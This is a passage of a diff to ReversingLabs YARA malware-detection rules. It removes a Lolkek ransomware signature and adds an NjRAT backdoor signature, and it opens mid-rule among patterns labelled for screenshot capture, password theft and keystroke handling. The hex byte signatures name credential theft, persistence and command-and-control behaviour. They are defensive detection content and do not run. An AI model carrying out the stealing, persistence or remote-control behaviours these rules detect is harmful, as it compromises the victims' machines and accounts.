?? ?? ?? + ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 + ?? ?? ?? ?? 13 ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ?? + ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 38 ?? ?? ?? ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 6F ?? ?? ?? ?? 72 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 38 ?? ?? ?? ?? 06 + 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 6F ?? + ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? + ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 33 + ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2B ?? 11 ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 11 + ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 2E ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 2C ?? 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 06 72 + ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 09 7B ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 6F ?? ?? + ?? ?? DC 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 + } + $take_screenshot = { + 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 73 ?? + ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0C 08 28 ?? ?? ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 0B 12 ?? 28 ?? ?? ?? ?? 16 16 06 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? + DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 06 + } + $get_passwords = { + 1F ?? 8D ?? ?? ?? ?? 25 16 73 ?? ?? ?? ?? A2 25 17 73 ?? ?? ?? ?? A2 25 18 73 ?? ?? + ?? ?? A2 25 19 73 ?? ?? ?? ?? A2 25 1A 73 ?? ?? ?? ?? A2 25 1B 73 ?? ?? ?? ?? A2 25 + 1C 73 ?? ?? ?? ?? A2 25 1D 73 ?? ?? ?? ?? A2 25 1E 73 ?? ?? ?? ?? A2 25 1F ?? 73 ?? + ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 25 1F ?? 73 ?? ?? ?? ?? A2 0A 73 ?? ?? ?? ?? + 25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 06 0C 16 0D 2B + ?? 08 09 9A 13 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE + ?? 09 17 58 0D 09 08 8E 69 32 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? + 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ?? + ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28 ?? + ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 02 39 ?? ?? ?? + ?? 06 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 07 6F ?? + ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D + ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? + ?? ?? 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? + 11 ?? 6F ?? ?? ?? ?? 16 31 ?? 07 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? + 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? (FE | 16) ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 07 + } + $process_key_action = { + 03 28 ?? ?? ?? ?? 2C ?? 02 17 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 02 7B ?? ?? ?? ?? 1A + 8D ?? ?? ?? ?? 25 16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ?? + ?? ?? ?? A2 25 19 07 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? + 0C 02 17 7D ?? ?? ?? ?? 02 16 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 1A 8D ?? ?? ?? ?? 25 + 16 03 8C ?? ?? ?? ?? A2 25 17 04 8C ?? ?? ?? ?? A2 25 18 05 8C ?? ?? ?? ?? A2 25 19 + 08 A2 6F ?? ?? ?? ?? 26 2A 02 7B ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? + ?? ?? ?? 0D 2B ?? 09 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 02 11 ?? 16 9A A5 ?? ?? ?? + ?? 11 ?? 17 9A A5 ?? ?? ?? ?? 11 ?? 18 9A A5 ?? ?? ?? ?? 11 ?? 19 9A 74 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 11 ?? 16 9A A5 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 03 04 11 ?? 19 9A 74 + ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 + 75 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 7B ?? ?? ?? ?? 6F ?? ?? + ?? ?? 28 ?? ?? ?? ?? 0A 02 03 04 05 06 28 + } + + condition: + uint16(0)==0x5A4D and (($get_tcp_connections) or ( all of ($get_operating_system_information_p*)) or ($take_screenshot) or ($get_passwords) or ($process_key_action)) } -rule REVERSINGLABS_Win32_Ransomware_Lolkek : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Njrat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects Lolkek ransomware." + description = "Yara rule that detects NjRAT backdoor." author = "ReversingLabs" - id = "441badd6-3708-5f74-90f3-4d3a0fc45aff" - date = "2020-10-23" - modified = "2020-10-23" + id = "578c813f-4bba-52cd-bcc7-4de2c3943cf7" + date = "2024-07-31" + modified = "2024-07-31" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Lolkek.yara#L1-L106" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "d18545b25a33bba1a6e01ab37768bd4f15fb125dcb8cbe7909d9a8bbe08e63fa" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/ByteCode.MSIL.Backdoor.NjRAT.yara#L1-L266" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "eeecf90965e6952d8b9efc9d1e96eaa47709b1d69fc7d435f4aebaaf0191f317" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Lolkek" + tc_detection_type = "Backdoor" + tc_detection_name = "NjRAT" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files = { - 57 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? - ?? ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99 - F7 F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 74 - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF D3 83 - C4 ?? 56 57 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? - 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? - ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99 F7 - F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 85 FF 0F 85 ?? ?? ?? ?? 5E 5B 33 C0 5F C2 - } - $find_volumes_p1 = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 - 57 E8 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 - 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? - ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? - ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 - 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? - ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 - ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? - ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 83 C4 ?? 89 74 24 ?? 33 - } - $find_volumes_p2 = { - FF 8B 5C BC ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 9C B4 ?? ?? ?? ?? 46 47 83 FF - ?? 7C ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? - ?? ?? ?? 8B D8 0F 1F 00 85 F6 74 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 57 - FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 - ?? 4E 57 FF B4 B4 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? - ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? - ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF - D7 33 D2 B9 ?? ?? ?? ?? F7 F1 68 ?? ?? ?? ?? 80 C2 ?? 88 94 34 ?? ?? ?? ?? FF D3 46 - 83 FE ?? 7C ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? - ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 15 - } - $find_files_p1 = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41 - F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? - ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? - FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? - 8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? - 8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57 - 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 - 45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 - ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? - ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 - ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? - 3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D - } - $find_files_p2 = { - 56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? - ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? - ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B - D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D - ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? - 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? - 75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? - ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? - ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? - ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 - C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 - ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - 59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } + $persistence_mechanism_v1_p1 = { + 00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? + ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? + ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 16 2B ?? 17 13 ?? 11 ?? 39 ?? ?? ?? ?? + 00 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? + 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? + ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? + ?? ?? ?? 17 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? + ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0A + 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 00 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 + 72 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ?? + ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2 + 00 11 ?? 28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 0B 00 28 + ?? ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F + ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? + ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 + DE ?? 25 28 ?? ?? ?? ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? + ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E + ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 + } + $persistence_mechanism_v1_p2 = { + 28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 + 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 1D 28 ?? ?? ?? ?? + 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 00 1D + 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 73 ?? + ?? ?? ?? 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 + 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 16 + 15 28 ?? ?? ?? ?? 26 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 18 28 ?? + ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? + ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 13 ?? 18 13 ?? 28 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 13 ?? + 11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 28 ?? ?? ?? ?? 11 ?? 11 + ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? + 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 72 ?? ?? ?? ?? + 11 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 + ?? 72 ?? ?? ?? ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ?? + 11 ?? 28 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 + ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 + } + $connect_v1_p1 = { + 00 16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 0B 00 07 13 ?? + 11 ?? 28 ?? ?? ?? ?? 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 + ?? 2C ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 14 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? + ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28 + ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? + ?? ?? DE ?? 00 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? + ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? + ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? + 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 18 + 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 + 00 11 ?? 14 14 14 17 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 17 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00 + 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? + ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 7F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 + } + $connect_v1_p2 = { + 00 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00 + 11 ?? 17 7E ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? + A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? + ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? A2 00 11 ?? 1A 72 ?? + ?? ?? ?? A2 00 11 ?? 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1C 72 ?? ?? ?? ?? + A2 00 11 ?? 1D 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1E 72 ?? ?? ?? ?? A2 00 11 + ?? 1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? + 1F ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F + ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? + 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E + ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 00 11 ?? 1F ?? 7E ?? + ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? + ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 13 + ?? 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 16 80 ?? ?? ?? ?? 28 + ?? ?? ?? ?? DE ?? 00 00 DE ?? 11 ?? 28 ?? ?? ?? ?? 00 DC 7E ?? 